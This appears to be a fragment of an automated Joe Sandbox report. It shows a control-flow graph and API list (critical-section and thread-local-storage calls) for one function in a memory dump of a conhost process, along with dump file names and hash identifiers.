                                                                    control_flow_graph 624 14000219e-1400021a5 625 140002272-140002280 624->625 626 1400021ab-1400021c2 EnterCriticalSection 624->626 627 140002265-14000226c LeaveCriticalSection 626->627 628 1400021c8-1400021d6 626->628 627->625 629 1400021e9-1400021f5 TlsGetValue GetLastError 628->629 630 1400021f7-1400021fa 629->630 631 1400021e0-1400021e7 629->631 630->631 632 1400021fc-140002209 630->632 631->627 631->629 632->631
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000024.00000002.3248255656.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                    • Associated: 00000024.00000002.3248231403.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248288460.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248349670.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000024.00000002.3248369050.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_36_2_140000000_conhost.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                    • String ID:
                                                                    • API String ID: 682475483-0
                                                                    • Opcode ID: 75c239d6f9b1b05cd32b51954dacabd1d99c2907a8b4144d0770202a5cd4097e
                                                                    • Instruction ID: 57be894ec6e479b01b3bdbc431c3049754870fdb45279c41188df5f75f20f987
                                                                    • Opcode Fuzzy Hash: 75c239d6f9b1b05cd32b51954dacabd1d99c2907a8b4144d0770202a5cd4097e
                                                                    • Instruction Fuzzy Hash: 2F01B6B5305A0192FA5BDB53FD083D86364BB6CBD1F854021EF09536B4DB75C996C300